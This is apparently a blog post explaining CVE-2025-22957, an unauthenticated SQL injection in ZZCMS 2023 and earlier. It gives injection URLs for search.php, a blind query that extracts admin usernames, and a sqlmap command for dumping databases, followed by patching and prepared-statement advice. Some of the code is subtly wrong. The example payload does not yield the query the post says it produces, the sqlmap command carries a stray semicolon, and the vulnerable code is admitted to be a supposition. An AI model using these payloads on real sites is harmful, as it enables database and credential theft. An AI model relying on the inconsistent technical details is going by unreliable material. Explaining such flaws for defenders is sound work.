CVE-2025-22957 - Exploiting a Critical SQL Injection in ZZCMS <= 2023 (Unauthenticated)

ZZCMS is a widely used, open-source content management system popular among small businesses and personal blogs in Asia. Recently, a nasty vulnerability has been discovered in its front-end — tracked as CVE-2025-22957 — that lets attackers launch SQL injection attacks without even logging in. This blog post will break down what’s going on, how attackers can exploit it, and show you simple code snippets that prove the point. If you’re running ZZCMS 2023 or earlier, you'll want to read this and patch ASAP!

What’s CVE-2025-22957?

ZZCMS (versions 2023 and below) fails to properly sanitize user-provided input on its front-end, specifically in the way it handles query parameters in GET requests. This carelessness means anyone on the public internet could send powerful SQL commands directly to your database — no password or login required.

Let’s suppose ZZCMS exposes URLs like this for product listings

https://yourdomain.com/search.php?keywords=shoes

The content of keywords is directly placed into an SQL query without escaping, like so

// In search.php (simplified for illustration)
$sql = "SELECT * FROM products WHERE name LIKE '%" . $_GET['keywords'] . "%'";

The Attacker’s Injection

By simply tweaking the URL, an attacker can end the intended SQL and run their own commands. For example:

https://yourdomain.com/search.php?keywords='; OR 1=1--

What does this do?

The SQL on the backend becomes

SELECT * FROM products WHERE name LIKE '%' OR 1=1-- %'

The part after -- is ignored as a comment, so this query returns all products, because OR 1=1 is always true. The attacker can do a lot worse than this. They can extract database info, dump user tables, and more.

Realistic Exploit Demo

Let's say the attacker wants to leak usernames and passwords from the zzcms_admin table.

Step 1: Find the vulnerable parameter

Easy, just note that keywords is passed directly.

Suppose the attacker wants to check if the first character of the first admin username is a

https://yourdomain.com/search.php?keywords='; OR (SELECT SUBSTRING(username,1,1) FROM zzcms_admin LIMIT 1)='a'--

If the page responds differently, they know the guess was correct.

Tools like sqlmap can automate the database dump

sqlmap -u "https://yourdomain.com/search.php?keywords=test"; --dbs --batch

Sqlmap will figure out the injection spot and start pulling out all your DB names and tables with no need for login.

Protect Yourself

- Upgrade ZZCMS immediately: Check the official site for the latest, patched version and apply updates.

Sanitize inputs: Always use PHP’s parameterized queries or prepared statements.

- Web Application Firewall (WAF): Set up a WAF (like ModSecurity) to block basic SQL injection attempts.

References

- CVE Detail page for CVE-2025-22957
- ZZCMS downloads & updates
- sqlmap free SQL injection tool
- Wikipedia: SQL injection

Final Words

Ignoring this vulnerability is risky. With CVE-2025-22957, an attacker doesn't even need a password — just a browser and a little knowledge. Patch as soon as possible, and if you can, educate your team about safe database handling, so similar bugs don’t show up in your own code.

If you liked this guide or want more hands-on security tips, please subscribe to our updates!

Timeline

Published on: 01/31/2025 17:15:16 UTC
Last modified on: 03/20/2025 16:15:16 UTC